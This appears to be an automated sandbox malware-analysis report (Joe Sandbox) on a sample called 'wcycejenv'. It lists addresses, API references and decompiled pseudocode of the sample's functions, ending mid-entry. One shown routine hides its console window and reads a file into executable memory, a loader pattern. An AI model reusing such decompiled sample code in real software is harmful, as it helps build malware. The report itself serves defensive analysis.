0x004074a1
0x004074ac
0x004074ac
0x004074b1
0x004074c2
0x004074c4
0x004074c4
0x004074c9
0x004074d9
0x004074db
0x004074df
0x004074df
0x004074fa
0x00407506
0x0040750b
0x0040750f
0x00407518
0x00407523
0x0040751a
0x0040751a
0x0040751a
0x0040752d
0x00407530
0x00000000
0x004074fc
0x00000000
0x004074fc
0x004074fa
0x00407539
0x00000000
0x00407539
0x00407208
0x00407215
0x0040721e
0x00407223
0x0040722e
0x00407233
0x00000000
0x00407233
0x00407146
0x00407154
0x00000000
0x00000000
0x00407177
0x0040717d
0x0040718e
0x00407194
0x00407194
0x0040719f
0x004071a1
0x004071a7
0x004071ad
0x004071c3
0x004071e9
0x004071ee
0x004071ee
0x004071f1
0x004071f1
0x00000000
0x00407194
0x00406a3c
0x004068ff
0x00406905
0x00000000
0x00406905
0x00406a26
0x00406960
0x00406967
0x00000000
0x0040696e
0x00000000
0x00000000
0x0040697d
0x00000000
0x00000000
0x0040698c
0x00000000
0x00000000
0x0040699b
0x00000000
0x00000000
0x004069a4
0x00000000
0x00000000
0x004069b0
0x004069b5
0x004069ba
0x004069c1
0x004069c7
0x004069d3
0x004069db
0x004069db
0x00000000
0x00000000
0x004069e0
0x00000000
0x00000000
0x004069ec
0x004069f1
0x004069f3
0x004069fd
0x00406a06
0x00406a0e
0x00406a12
0x00406a1a
0x00406a1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406967
0x00000000
0x0040692a
0x00000000
0x004068b1
0x004068b9
0x004068d1
0x004068db
0x004068e1
0x004068e7
0x004068ed
0x004068f2
0x004068fa
0x00000000
0x004068c6
0x004068cc
0x00000000
0x004068cc
0x004065a2
0x004065b4
0x004065c8
0x004065db
0x004065f2
0x00406606
0x00406619
0x0040662c
0x00406640
0x00406653
0x00406666
0x0040667d
0x00406690
0x004066a3
0x004066b6
0x004066cd
0x004066e0
0x004066f4
0x00406708
0x0040671f
0x00406727
0x00406730
0x0040673d
0x00406743
0x00406747
0x0040674c
0x00406756
0x00406768
0x00406770
0x00406779
0x00406785
0x00406794
0x004067a6
0x004067ac
0x004067b8
0x004067b8
0x004067c9
0x004067d1
0x004067e2
0x004067f7
0x00406803
0x0040680a
0x00406838
0x0040683d
0x00406840
0x0040684c
0x00406856
0x0040685c
0x00406869
0x00000000
0x00406732
0x00000000
0x00406732
0x0040651e
0x0040651e
0x0040753b
0x0040753f
0x0040753f

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 004064FB
ShowWindow.USER32(00000000), ref: 00406502
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406559
GetFileSize.KERNEL32(?,00000000), ref: 00406568
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040657E
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0040659C

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
String ID:
API String ID: 3075330158-0
Opcode ID: cb8e35164fbe6d12b15b8e15c25d763f23802b8f436550cebbfee87c8a6da5b1
Instruction ID: a6a5ad519feb42763fc3c44f1f914607d9845c3a30049c3f328ba553c28d1fa8
Opcode Fuzzy Hash: cb8e35164fbe6d12b15b8e15c25d763f23802b8f436550cebbfee87c8a6da5b1
Instruction Fuzzy Hash: FF0169F2C04208DBEB109FD4EC6E7CF7BB4EB04319F560029D400A63C0E3BA95448B96

Uniqueness

Uniqueness Score: -1.00%

Function 00433C26 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00433C26(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00430BC8(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E0042CDDE(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E0042E2C2(0);
				return _t35;
			}

0x00433c2c
0x00433c33
0x00433c38
0x00433c3c
0x00433c43
0x00433c49
0x00433c49
0x00433c4f
0x00433c51
0x00433c54
0x00433c54
0x00433c57
0x00433c59
0x00433c5f
0x00433c63
0x00433c68
0x00433c6c
0x00433c6e
0x00433c71
0x00433c77
0x00433c7e
0x00433c82
0x00433c86
0x00433c89
0x00433c8c
0x00433c8c
0x00433c90
0x00433c93
0x00433c45
0x00433c45
0x00433c45
0x00433c95
0x00433ca0

APIs

Part of subcall function 00430BC8: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042DBB2,00000001,00000364,00000006,000000FF,?,?,0042C13A,0042E2E8,?,?,0042B259), ref: 00430C09

_free.LIBCMT ref: 00433C95

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 65690219f5dc003b3048f71381f2cfd68c4c54c4182fd1d133432878258f9c83
Instruction ID: 324819c897046f39841648688ea65db4c65900b8a6385127f5d77d31167ba6ff
Opcode Fuzzy Hash: 65690219f5dc003b3048f71381f2cfd68c4c54c4182fd1d133432878258f9c83
Instruction Fuzzy Hash: 55014973604316ABC321CFAAD88599EFB98EB09374F11166FE455B76C0D7746D00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00430BC8 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00430BC8(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x456ea4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0042ADDC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0042C135(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00436EC5(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00430bce
0x00430bd3
0x00430be1
0x00430be1
0x00430be7
0x00430be9
0x00430be9
0x00430c00
0x00430c09
0x00430c11
0x00000000
0x00000000
0x00430bf1
0x00430bf3
0x00430c15
0x00430c1a
0x00430c20
0x00000000
0x00430c20
0x00430bfc
0x00430bfe
0x00000000
0x00000000
0x00430bfe
0x00000000
0x00430c00
0x00430bd9
0x00430bdf
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042DBB2,00000001,00000364,00000006,000000FF,?,?,0042C13A,0042E2E8,?,?,0042B259), ref: 00430C09

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c92009d428378eb4c33cbe27ad0caa44e1e29c8f2274aac75f092873083e8a6f
Instruction ID: ed22e927d5d164ec14f608a76e58d7c7f17f77a472cd2789c25b121b618a8701
Opcode Fuzzy Hash: c92009d428378eb4c33cbe27ad0caa44e1e29c8f2274aac75f092873083e8a6f
Instruction Fuzzy Hash: 89F02431204128ABDF281B22AC16B5B77589F49764F15B327EC149A282CA28EC0186AC

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2FC Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042E2FC(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0042C135(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x456ea4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0042ADDC();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00436EC5(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0042e302
0x0042e308
0x0042e33a
0x0042e33f
0x0042e345
0x00000000
0x0042e345
0x0042e30c
0x0042e30e
0x0042e30e
0x0042e325
0x0042e32e
0x0042e336
0x00000000
0x00000000
0x0042e316
0x0042e318
0x00000000
0x00000000
0x0042e321
0x0042e323
0x00000000
0x00000000
0x0042e323
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0043753F,004515E8,00000018,00000003,00451608,00000028,0042B9E6,00000016,0042DACC), ref: 0042E32E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 374b63fa9cc5dc9ed33cb946fdbc55c2937f615d3789ee79effcebe8696e5d5b
Instruction ID: f13f795b5988556ce273a5fd3ecd1f2d6bc8ca5cffa1bd8d310fc6de44990611
Opcode Fuzzy Hash: 374b63fa9cc5dc9ed33cb946fdbc55c2937f615d3789ee79effcebe8696e5d5b
Instruction Fuzzy Hash: DBE0A026301231ABDA206677FC06B9BA6589B513A7FC50127EC4197282CB28DC0181EE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405030 Relevance: 13.6, APIs: 9, Instructions: 103
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00405030(void* __edi, void* __esi) {
				WCHAR* _t156;
				signed int _t173;
				intOrPtr _t175;
				signed char* _t176;
				void* _t197;
				void* _t199;
				intOrPtr _t203;
				signed char* _t237;
				struct _SECURITY_ATTRIBUTES* _t247;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t311;

				_t304 = __esi;
				_t303 = __edi;
				while( *(_t305 - 8) != 0) {
					E004097A0(_t303, _t305 - 0x2c4, 0, 0x208);
					_t307 = _t307 + 0xc;
					 *(_t305 - 0x2c) = 0;
					 *(_t305 - 4) = 0;
					 *(_t305 - 0x20) = 0;
					 *(_t305 - 0x28) = 0;
					if( *((intOrPtr*)(_t305 - 0x3c)) == 0) {
						 *(_t305 - 4) =  *(_t305 - 8);
						while( *(_t305 - 0x28) != 0 || ( *( *(_t305 - 4)) & 0x0000ffff) != 0x3b) {
							if(( *( *(_t305 - 4)) & 0x0000ffff) != 0) {
								if(( *( *(_t305 - 4)) & 0x0000ffff) == 0x22) {
									if( *(_t305 - 0x28) != 0) {
										 *(_t305 - 0x40) = 0;
									} else {
										 *(_t305 - 0x40) = 1;
									}
									 *(_t305 - 0x28) =  *(_t305 - 0x40);
								}
								 *(_t305 - 4) =  &(( *(_t305 - 4))[1]);
								continue;
							}
							break;
						}
						if(( *( *(_t305 - 4)) & 0x0000ffff) == 0) {
							lstrcpyW(_t305 - 0x2c4,  *(_t305 - 8));
							 *(_t305 - 8) = 0;
						} else {
							E00408CA0(_t305 - 0x2c4,  *(_t305 - 8),  *(_t305 - 4) -  *(_t305 - 8) >> 1 << 1);
							_t307 = _t307 + 0xc;
							 *((short*)(_t305 + ( *(_t305 - 4) -  *(_t305 - 8) >> 1) * 2 - 0x2c4)) = 0;
							 *(_t305 - 8) =  &(( *(_t305 - 4))[1]);
						}
						 *(_t305 - 0x2c) = lstrlenW(_t305 - 0x2c4);
						if(( *(_t305 +  *(_t305 - 0x2c) * 2 - 0x2c6) & 0x0000ffff) == 0x22) {
							 *(_t305 +  *(_t305 - 0x2c) * 2 - 0x2c6) = 0;
						}
						if(( *(_t305 + 0xfffffffffffffd3c) & 0x0000ffff) == 0x22) {
							lstrcpyW(_t305 - 0x4cc, _t305 - 0x2c2);
						} else {
							lstrcpyW(_t305 - 0x4cc, _t305 - 0x2c4);
						}
						0x400000(0);
						_t156 = E00403F90(_t305 - 0x4cc, _t305 - 0x4cc, _t305 - 0x2c4, _t305 - 0x2c4, _t305 - 0x2c4);
						if(_t156 != 0) {
							goto L24;
						} else {
						}
					} else {
						lstrcpyW(_t305 - 0x2c4,  *(_t305 - 8));
						 *(_t305 - 8) = 0;
						L24:
						lstrcatW(_t305 - 0x2c4, "\\");
						lstrcatW(_t305 - 0x2c4, _t305 - 0x6d4);
						_t173 = lstrlenW(_t305 - 0x2c4);
						_t154 = _t305 + _t173 * 2 - 0x2c4;
						 *(_t305 - 4) = _t305 + _t173 * 2 - 0x2c4;
						if( *((intOrPtr*)(_t305 - 0x30)) != 0 && GetFileAttributesW(_t305 - 0x2c4) != 0xffffffff) {
							 *(_t305 - 0x20) = 1;
						}
						if( *(_t305 - 0x20) == 0) {
							lstrcatW(_t305 - 0x2c4, L".*");
							 *(_t305 - 0x44) = FindFirstFileW(_t305 - 0x2c4, _t305 - 0x924);
							_t154 = FindClose( *(_t305 - 0x44));
							if( *(_t305 - 0x44) != 0xffffffff) {
								_t154 = _t305 - 0x8bd8;
								 *(_t305 - 0xc) = _t305 - 0x8bd8;
								while( *(_t305 - 0xc) != 0) {
									_t203 = E004088E2( *(_t305 - 0xc), 0x3b);
									_t307 = _t307 + 8;
									 *((intOrPtr*)(_t305 - 0x1c)) = _t203;
									if( *((intOrPtr*)(_t305 - 0x1c)) == 0) {
										lstrcpyW( *(_t305 - 4),  *(_t305 - 0xc));
										 *(_t305 - 0xc) = 0;
									} else {
										E00408CA0( *(_t305 - 4),  *(_t305 - 0xc),  *((intOrPtr*)(_t305 - 0x1c)) -  *(_t305 - 0xc) >> 1 << 1);
										_t307 = _t307 + 0xc;
										( *(_t305 - 4))[ *((intOrPtr*)(_t305 - 0x1c)) -  *(_t305 - 0xc) >> 1] = 0;
										 *(_t305 - 0xc) =  *((intOrPtr*)(_t305 - 0x1c)) + 2;
									}
									if(GetFileAttributesW(_t305 - 0x2c4) != 0xffffffff) {
										 *(_t305 - 0x20) = 1;
										 *(_t305 - 0xc) = 0;
									}
								}
							}
						}
						if( *(_t305 - 0x20) == 0) {
							continue;
						} else {
							_t175 = E00408992(_t305 - 0x2c4, 0x2e);
							_t310 = _t307 + 8;
							 *((intOrPtr*)(_t305 - 0x34)) = _t175;
							do {
								_t237 =  *0x4494a8; // 0x4533bc
								if(( *_t237 & 8) != 0) {
									_t176 =  *0x4494a8; // 0x4533bc
									 *(_t305 - 0x5c) = _t176;
									 *((intOrPtr*)(_t305 - 0x60)) = 3;
									E00406000( *((intOrPtr*)(_t305 - 0x60)),  *(_t305 - 0x5c), "WCMD_run_program", "Found as %s\n", E00406150(_t305 - 0x2c4));
									_t310 = _t310 + 0x14;
								}
							} while (0 != 0);
							if( *((intOrPtr*)(_t305 - 0x34)) == 0) {
								L46:
								 *((intOrPtr*)(_t305 - 0x68)) = FindExecutableW(_t305 - 0x2c4, 0, _t305 - 0x4cc);
								if( *((intOrPtr*)(_t305 - 0x68)) >= 0x20) {
									 *(_t305 - 0x38) = SHGetFileInfoW(_t305 - 0x4cc, 0, _t305 - 0xbd8, 0x2b4, 0x2000);
								} else {
									 *(_t305 - 0x38) = 0;
								}
								E004097A0(_t303, _t305 - 0xbc, 0, 0x44);
								_t307 = _t310 + 0xc;
								 *(_t305 - 0xbc) = 0x44;
								E00405DA0(_t305 - 0xbc);
								 *((intOrPtr*)(_t305 - 0x48)) = CreateProcessW(_t305 - 0x2c4,  *(_t305 + 8), 0, 0, 1, 0, 0, 0, _t305 - 0xbc, _t305 - 0x78);
								0x400000( *((intOrPtr*)(_t305 - 0x88)));
								if( *0x454c2c != 0 ||  *0x454c30 != 0) {
									if( *0x454c34 != 0 ||  *((intOrPtr*)(_t305 - 0x48)) != 0 || GetLastError() != 2) {
										goto L56;
									} else {
										_t154 = 0;
										if(( *( *(_t305 + 8)) & 0x0000ffff) != 0x22) {
											goto L56;
										} else {
											E004056C0( *(_t305 + 8));
											 *0x454c34 = 1;
											_t156 = E004049D0(_t303, _t304,  *(_t305 + 8),  *((intOrPtr*)(_t305 + 0xc)));
										}
									}
								} else {
									L56:
									if( *((intOrPtr*)(_t305 - 0x48)) != 0) {
										if( *0x456ef0 == 0 ||  *(_t305 - 0x38) != 0 && ( *(_t305 - 0x38) >> 0x00000010 & 0xffff) == 0) {
											WaitForSingleObject( *(_t305 - 0x78), 0xffffffff);
										}
										GetExitCodeProcess( *(_t305 - 0x78), 0x457190);
										if( *0x457190 == 0x103) {
											 *0x457190 = 0;
										}
										CloseHandle( *(_t305 - 0x78));
										_t156 = CloseHandle( *(_t305 - 0x74));
									} else {
										break;
									}
								}
							} else {
								_t197 = E0042B692(_t303, _t304,  *((intOrPtr*)(_t305 - 0x34)), L".bat");
								_t311 = _t310 + 8;
								if(_t197 == 0) {
									L45:
									_t247 =  *0x456ef0; // 0x0
									 *(_t305 - 0x64) = _t247;
									 *0x456ef0 = 0;
									_t156 =  *(_t305 + 8);
									0x400000(_t305 - 0x2c4, _t156,  *((intOrPtr*)(_t305 + 0xc)), 0, 0xffffffff);
									 *0x456ef0 =  *(_t305 - 0x64);
								} else {
									_t199 = E0042B692(_t303, _t304,  *((intOrPtr*)(_t305 - 0x34)), L".cmd");
									_t310 = _t311 + 8;
									if(_t199 != 0) {
										goto L46;
									} else {
										goto L45;
									}
								}
							}
						}
					}
					L69:
					return _t156;
				}
				if( *((intOrPtr*)(_t305 + 0xc)) == 0) {
					_t156 = E00404420(E004011B0(_t154, 0x410),  *(_t305 + 8));
					 *0x457190 = 0x2331;
				} else {
					 *(_t305 - 0x24) = 0;
					E00401240( *(_t305 + 8), _t303,  *(_t305 + 8), _t305 - 0x24, 0xffffffff);
					E00404890(_t303,  *(_t305 - 0x24), 0,  *((intOrPtr*)(_t305 + 0xc)));
					_t156 = E00403F40( *(_t305 - 0x24),  *(_t305 - 0x24));
					 *(_t305 - 0x24) = 0;
				}
				goto L69;
			}

0x00405030
0x00405030
0x004051b5
0x00404c95
0x00404c9a
0x00404c9d
0x00404ca4
0x00404cab
0x00404cb2
0x00404cbd
0x00404cdf
0x00404ce2
0x00404cfb
0x00404d06
0x00404d0c
0x00404d17
0x00404d0e
0x00404d0e
0x00404d0e
0x00404d21
0x00404d21
0x00404d2a
0x00000000
0x00404d2a
0x00000000
0x00404cfb
0x00404d37
0x00404d7f
0x00404d85
0x00404d39
0x00404d4f
0x00404d54
0x00404d61
0x00404d6f
0x00404d6f
0x00404d99
0x00404daa
0x00404db1
0x00404db1
0x00404dcc
0x00404df2
0x00404dce
0x00404ddc
0x00404ddc
0x00404e08
0x00404e15
0x00404e1c
0x00000000
0x00000000
0x00404e1e
0x00404cbf
0x00404cca
0x00404cd0
0x00404e23
0x00404e2f
0x00404e43
0x00404e50
0x00404e56
0x00404e5d
0x00404e64
0x00404e78
0x00404e78
0x00404e83
0x00404e95
0x00404eaf
0x00404eb6
0x00404ec0
0x00404ec6
0x00404ecc
0x00404ecf
0x00404edf
0x00404ee4
0x00404ee7
0x00404eee
0x00404f2f
0x00404f35
0x00404ef0
0x00404f03
0x00404f08
0x00404f18
0x00404f22
0x00404f22
0x00404f4c
0x00404f4e
0x00404f55
0x00404f55
0x00404f5c
0x00404ecf
0x00404ec0
0x00404f65
0x00000000
0x00404f6b
0x00404f74
0x00404f79
0x00404f7c
0x00404f7f
0x00404f7f
0x00404f8b
0x00404f8d
0x00404f92
0x00404f95
0x00404fbb
0x00404fc0
0x00404fc0
0x00404fc3
0x00404fcb
0x00405035
0x0040504b
0x00405052
0x0040507d
0x00405054
0x00405054
0x00405054
0x0040508b
0x00405090
0x00405093
0x004050a4
0x004050d1
0x004050db
0x004050e7
0x004050f9
0x00000000
0x0040510c
0x00405111
0x0040511e
0x00000000
0x00405120
0x00405124
0x00405129
0x0040513b
0x0040513b
0x0040511e
0x00405145
0x00405145
0x00405149
0x00405154
0x00405174
0x00405174
0x00405183
0x00405193
0x00405195
0x00405195
0x004051a3
0x004051ad
0x0040514b
0x00000000
0x0040514b
0x00405149
0x00404fcd
0x00404fd6
0x00404fdb
0x00404fe0
0x00404ff7
0x00404ff7
0x00404ffd
0x00405000
0x00405012
0x0040501d
0x00405025
0x00404fe2
0x00404feb
0x00404ff0
0x00404ff5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ff5
0x00404fe0
0x00404fcb
0x00404f65
0x00405218
0x0040521b
0x0040521b
0x004051be
0x00405206
0x0040520e
0x004051c0
0x004051c0
0x004051d1
0x004051e0
0x004051e9
0x004051ee
0x004051ee
0x00000000

APIs

lstrcpyW.KERNEL32 ref: 00404CCA
lstrlenW.KERNEL32(?), ref: 00404D93
lstrcpyW.KERNEL32 ref: 00404DDC
lstrcatW.KERNEL32(?,00453704), ref: 00404E2F
lstrcatW.KERNEL32(?,?), ref: 00404E43
lstrlenW.KERNEL32(?), ref: 00404E50
GetFileAttributesW.KERNEL32(?), ref: 00404E6D
lstrcatW.KERNEL32(?,00453708), ref: 00404E95
FindFirstFileW.KERNEL32(?,?), ref: 00404EA9
FindClose.KERNEL32(?), ref: 00404EB6
lstrcpyW.KERNEL32 ref: 00404F2F
GetFileAttributesW.KERNEL32(?), ref: 00404F43
_wcsrchr.LIBVCRUNTIME ref: 00404F74

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Filelstrcatlstrcpy$AttributesFindlstrlen$CloseFirst_wcsrchr
String ID:
API String ID: 4048766172-0
Opcode ID: 1671b48d2815593aa62a6eef7016101d72d64909e7efe5eeb95732c703e64b38
Instruction ID: 685b23bb7aa508070274243718dc2acc13774786de3d5b111ddd6c099e50474c
Opcode Fuzzy Hash: 1671b48d2815593aa62a6eef7016101d72d64909e7efe5eeb95732c703e64b38
Instruction Fuzzy Hash: F3413BB5C00209EFDB10DFA4C948BDFB7B5BB88306F1086AAE115B22D4D7785A49DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404110 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00404110(void* _a4, char _a8) {
				short _v8;
				char* _v12;
				long _v16;
				signed char* _v20;
				long _v24;
				long _t25;
				signed char* _t26;
				signed char* _t32;
				void* _t40;

				_v12 =  &_a8;
				_v8 = 0;
				_v16 = FormatMessageW(0x500, _a4, 0, 0,  &_v8, 0,  &_v12);
				_v12 = 0;
				if(_v16 != 0) {
					L6:
					E00404330(_v8, _v8, _v16, GetStdHandle(0xfffffff5));
					return LocalFree(_v8);
				}
				_t25 = GetLastError();
				if(_t25 == 0xeb) {
					goto L6;
				} else {
					goto L2;
				}
				do {
					L2:
					_t32 =  *0x4494a8; // 0x4533bc
					if(( *_t32 & 1) != 0) {
						_t26 =  *0x4494a8; // 0x4533bc
						_v20 = _t26;
						_v24 = 0;
						_push(E00406150(_a4));
						_t25 = E00406000(_v24, _v20, "WCMD_output", "Could not format string: le=%lu, fmt=%s\n", GetLastError());
						_t40 = _t40 + 0x18;
					}
				} while (0 != 0);
				return _t25;
			}

0x00404119
0x0040411c
0x00404140
0x00404143
0x0040414e
0x004041ab
0x004041bc
0x00000000
0x004041c5
0x00404150
0x0040415b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040415d
0x0040415d
0x0040415d
0x00404169
0x0040416b
0x00404170
0x00404173
0x00404183
0x0040419d
0x004041a2
0x004041a2
0x004041a5
0x00000000

APIs

FormatMessageW.KERNEL32(00000500,?,00000000,00000000,00000000,00000000,?), ref: 0040413A
GetLastError.KERNEL32 ref: 00404150
GetLastError.KERNEL32(00000000,00000000), ref: 00404184
GetStdHandle.KERNEL32(000000F5), ref: 004041AD
LocalFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 004041C5

Strings

WCMD_output, xrefs: 00404190
Could not format string: le=%lu, fmt=%s, xrefs: 0040418B

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$FormatFreeHandleLocalMessage
String ID: Could not format string: le=%lu, fmt=%s$WCMD_output
API String ID: 2131822503-2335181908
Opcode ID: 54b11f192b1e0f7778168d2feadeca19cf9fe16b2faa307e03c236dba0c997e1
Instruction ID: 480cd7a6c0a53e5e119dd4e353e6417ee8900e7e93e743a3a32120e2c6a741d8
